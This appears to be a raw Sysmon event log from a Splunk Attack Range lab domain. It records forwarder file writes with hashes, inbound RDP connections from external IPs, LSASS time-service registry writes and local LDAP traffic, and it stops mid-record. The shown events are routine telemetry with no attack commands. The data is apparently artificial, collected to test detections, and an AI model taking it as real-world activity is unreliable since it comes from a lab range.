SERVICEtcpfalsefalse87.236.208.230-59658-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000978879Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:07.795{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE1259E13C323E8860A43A66D0141520,SHA256=0086B9A828F990F3AAEA3429CDF3F81CE03006E87DC40514E72A7F658E4AA41D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050244Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:07.013{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=098C5BB633967FF70B28C0B4DD5207C7,SHA256=B54FB30C9E112EC4D6D7A745C424F7B5E7E1CF6707FCBA99EE1444AAA82BB58B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978878Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:03.930{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59572-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000978880Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:04.593{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49785-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001050247Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:08.296{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C770ABCA40F09F3F18BCB3D4C288C549,SHA256=FEE5FD1140BF8439DA6FCD5CB2CCED755F0035E09C8B55548F586764AD9C2EA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050246Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:08.296{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1B4B11146C68ECD9235C4B72EA4BE887,SHA256=1497134B31244822B415572A9DFB218A7A4FAD9256151C2AB4612CB6BADFDB00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050245Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:08.027{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9D2E0A38F341EB54575B6F37F7AC75F,SHA256=66199AE99B17F5A144FD78AF96D72455F869C7EF8B56D52ADF3AD323AEEBCDAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978881Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:09.014{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1CEDC3A8AE22485BC28A93AFFFED5C2,SHA256=88214E089B37D3926FFFCA4F764B16DB503730C15ACACD7A5A36B2D8BEFFAD8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050250Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:09.843{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C770ABCA40F09F3F18BCB3D4C288C549,SHA256=FEE5FD1140BF8439DA6FCD5CB2CCED755F0035E09C8B55548F586764AD9C2EA2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050249Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:09.091{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050248Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:09.043{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1076FFC7FCBA3538CABDB1F480F6924B,SHA256=209DF7783C5BCD21E7B397ABBE3CD327448A9D2CC6150D06E3BDC68353CE214B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978882Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:10.248{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A75DB47A7DEE6F7031DAF84B92D4988,SHA256=68E3A8AE12A7AA59A98A9EE88B963BBBD00FC4B940F9EE8116EE1DB562C798FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050251Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:10.074{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C98B20D2712CFF6F3CCF035788A8805,SHA256=0FB6749D65DCE0F2FBBF25F5F40111C95BA2B17CC2C4D3F4ECE51527C49F526D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978884Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:11.311{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFF5304DCDB9FA486B56D04C92C7F2E9,SHA256=DBEB2D110801A323D0DAC12A8A132E9E58B0C04146A931918979FD47997D39FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050254Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:08.766{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53370-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001050253Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:08.230{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-52386-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050252Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:11.091{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA0565688AAAE88947559608E616967C,SHA256=BA1D83FC8CD65F15AA51B51598A73AE58A445DCFEBD0C5B7AA39A795A6B9BF3C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978883Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:07.703{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59388-false10.0.1.12-8000- 23542300x8000000000000000978885Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:12.389{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE4560780780CF79F5994E2D47FB30B9,SHA256=58DB4B276215BA7BD8AF601BDD807026A374BACFE18D845263517AB27500C58F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050255Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:12.109{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=750EA789080C84D37C747409EF8118A5,SHA256=288FC82E1B5E02CA30B99220B958A8E5D603064B6BCB59D7999370C2E5B5168E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978887Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:13.686{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978886Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:13.608{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62D1F8938C06184CA4B2769C7092D82B,SHA256=F8E4D28E6B80BDA3131F22D856945736F713CC7C1B4ABE40AE68EF5AC2069487,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001050266Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:12:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001050265Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:12:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fce91d0) 13241300x80000000000000001050264Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:12:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b377-0x607e62d5) 13241300x80000000000000001050263Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:12:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b37f-0xc242cad5) 13241300x80000000000000001050262Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:12:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b388-0x240732d5) 13241300x80000000000000001050261Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:12:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001050260Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:12:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fce91d0) 13241300x80000000000000001050259Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:12:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b377-0x607e62d5) 13241300x80000000000000001050258Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:12:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b37f-0xc242cad5) 13241300x80000000000000001050257Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:12:13.572{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b388-0x240732d5) 23542300x80000000000000001050256Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:13.110{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4411B7B5C0FF85A831511BB336C459D,SHA256=960891DED96F359317709F76CF046EE7C7F1DC32D9E6977987467FE498E13DD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978888Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:14.780{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B09A501FF97A48233A3D223C9FB44B9,SHA256=3A08922923F381D0D36C7D4D72A012F4C2F604BF37BAF430C92A98426EA35016,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050267Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:14.124{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEDC14399310AD68A5EE08962AE927F1,SHA256=931C3F6585FB35C5318B5A6A13C526F9BD07222730F673131F032E1543EC8C9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978890Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:15.795{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D69081B8098E0AA8EB4884A8FDD42287,SHA256=DE429F01BD3735266AC3A5730FE40FC1505FD63D7834288967A0DB76BC7CA8B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050268Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:15.126{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78EB19A245E5DC0DFC58C359850E017D,SHA256=39294A61433F67D3768F467CE4EEC9FF7E5CEF0C76580A1701AB779377D9781F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978889Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:12.312{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59389-false10.0.1.12-8089- 23542300x8000000000000000978891Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:16.811{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=268F031784962E88C236C75C0D703BCD,SHA256=F3F58FC2AA95123F93EBEF6D3A40C604AB31DFCDF3CB8C9516CA78FE45CC91F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050272Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:16.657{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E743EEA2A7C91CF2ED90F66BC69F0E83,SHA256=65BD9BB040749FB80FF2FC012D3ACB907DF9F98F3ECF66599280470FD20C280C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050271Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:16.657{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BD6C785101CC9E174B7F9C638D4511D,SHA256=4325DC667955662DF6D8C4998DA5573E65B74BD536F122749E8ADAD147EDDCC9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050270Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:14.764{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53371-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050269Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:16.157{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9C55E283D66D84CA2EFCC26FD1D4B19,SHA256=8FAF69ED1B8CF4F08126C9E28C3A994F32DAAC6DD9FD1C521EEA0C64AFAD670E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978895Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:17.811{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0FFA1E8C291AF926E9EEF358C122F94,SHA256=B199082E1E18AD2A53DB27B5364A44B8D3DF5A07A5DB190CE898C5F92C97AAED,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050274Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:14.965{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49565-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050273Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:17.172{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB0101A76E127C4E91AF490F14DA70E2,SHA256=6BB898E488A02D583733ABD9251D1C4078105F8325C3C2168CF5F62B6DBB054B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978894Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:13.718{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59390-false10.0.1.12-8000- 23542300x8000000000000000978893Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:17.311{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=275FB3878BA19C5B528C1FD7F9C2FE11,SHA256=EDF6A093CE5FA485EBD575C9AE852FF15CAA236A6B85B8EB32B273EDBBB9126C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978892Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:17.311{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81AD6E453F39E7D1468AA36E42D0612D,SHA256=D1774C45C2C6E442963EFF429E600DE02D60C648C9B33DE2CD4189FF2CD6A730,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978898Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:18.826{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D8F1058B8A19D418AD02D6DEEAE773D,SHA256=B441F19633B64E3473FA05A80AD68510E9BF1F5A10293F27D61DAC4EC46B58FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050277Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:16.048{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53372-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001050276Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:16.048{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53372-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001050275Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:18.225{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49A6834663389BCCBA5DFE3920DA6A9A,SHA256=B14E42BC37BDF10CF8CB6DC806253820CBA81181A91B9E67B39015A21B46E788,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978897Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:14.591{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59097-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000978896Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:14.585{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50060-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978899Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:19.842{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6F8799E038A4D7DFF832CA614C8657D,SHA256=AAECFD7629881E54D5292154D840919005ADBC93AAF811D1EE4DAE327BE4C890,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050278Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:19.225{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33A0BF99A90609E5558F571828B88A28,SHA256=429B571DDE90493C91118AA9A56BD312C8CEF109F0B8856D119739EED106D236,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978900Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:20.858{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3D53BAE6F4BFE3ACBE2A4E2749816FB,SHA256=CC1BB3B0E62468EF6933347EEA53AB42BB022FA4BCD1E7CF2D9AD5EB669F5828,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050279Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 